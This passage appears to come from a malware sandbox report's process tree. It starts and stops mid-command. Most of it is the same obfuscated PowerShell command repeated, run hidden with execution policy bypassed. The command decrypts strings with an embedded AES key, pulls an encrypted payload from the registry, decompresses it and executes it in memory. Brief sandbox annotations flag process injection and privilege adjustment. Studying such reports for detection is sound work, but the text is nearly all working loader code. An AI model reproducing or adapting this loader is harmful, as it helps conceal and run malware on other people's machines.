[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:6032
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5468).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:712
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5468).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2848
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5468).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = 